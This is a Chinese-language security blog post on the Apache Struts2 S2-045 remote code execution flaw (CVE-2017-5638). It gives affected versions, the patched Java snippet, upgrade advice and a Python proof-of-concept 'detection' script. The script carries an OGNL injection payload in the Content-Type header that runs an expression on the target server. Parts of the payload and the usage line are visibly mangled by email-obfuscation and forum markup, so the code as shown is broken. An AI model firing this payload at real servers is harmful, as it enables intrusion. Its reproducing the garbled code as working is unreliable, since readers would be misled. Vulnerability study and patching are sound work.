漏洞简介

  Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互;
  Struts2框架存在多个远程代码执行(S2-005、S2-009、S2-013、S2-016、S2-019、S2-020、S2-037、devmode),恶意攻击者可利用漏洞直接获取应用系统的Webshell,甚至获取操作系统以及数据库的权限。

漏洞编号:S2-045
CVE编号:CVE-2017-5638

漏洞类型:远程代码执行
漏洞级别:高危
漏洞风险:黑客通过利用漏洞可以实现远程命令执行。
影响版本:struts2.3.5 – struts2.3.31 , struts2.5 – struts2.5.10

漏洞分析

  恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。

漏洞关键点

1.基于Jakarta(Jakarta Multipart parser)插件的文件上传功能

2.恶意攻击者精心构造Content-Type的值

  • 通过版本比对定位漏洞原因:

1.coresrcmainjavaorgapachestruts2dispatchermultipartMultiPartRequestWrapper.java

2.coresrcmainjavaorgapachestruts2dispatchermultipartJakartaMultiPartRequest.java
3.coresrcmainjavaorgapachestruts2dispatchermultipartJakartaStreamMultiPartRequest.java

  • 三个文件修改内容相同,加固方式对用户报错加了条件判断。
if  (LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null,  new Object[0]) == null) {
        return LocalizedTextUtil.findText(this.getClass(),  "struts.messages.error.uploading", defaultLocale, null, new  Object { e.getMessage() });
     } else {
        return  LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null,  args);
     }

漏洞利用

附上一个检测脚本,仅作检测试用,并无攻击性payload;

#!/usr/bin/env python
#coding:utf8
#code by secevery.com
import sys
import requests
requests.packages.urllib3.disable_warnings() 
def poccheck(url):
    result = False
    header = {
        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
        'Content-Type':"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println(88888888-23333+1222)).(#o.close())}"
    }
    try:
        response = requests.post(url,data='',headers=header,verify=False,allow_redirects = False)
        if response.content.find("88866777")!=-1:
            result = url+" find struts2-45"
    except Exception as e:
        print str(e)
        pass
    return result
 
if __name__ == '__main__':
    if len(sys.argv) == 2:
        print poccheck(sys.argv[1])
        sys.exit(0)
    else:
        print ("usage: %s [url=http://www.baidu.com/vuln.action"]http://www.baidu.com/vuln.action"[/url] % sys.argv[0])
        sys.exit(-1)
仅用于公司内部人员测试,切勿非法用途.https://github.com/mottoin/S2-045

漏洞影响范围:

Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10

漏洞修复建议(或缓解措施):

  1.  检测方式查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar ,如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞,更新至Strusts2.3.32或者Strusts2.5.10.1,或使用第三方的防护设备进行防护。
  1.  临时解决方案:删除commons-fileupload-x.x.x.jar文件(会造成上传功能不可用)
原帖地址:http://zone.secevery.com/?/article/440

本文由 秋边丶 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论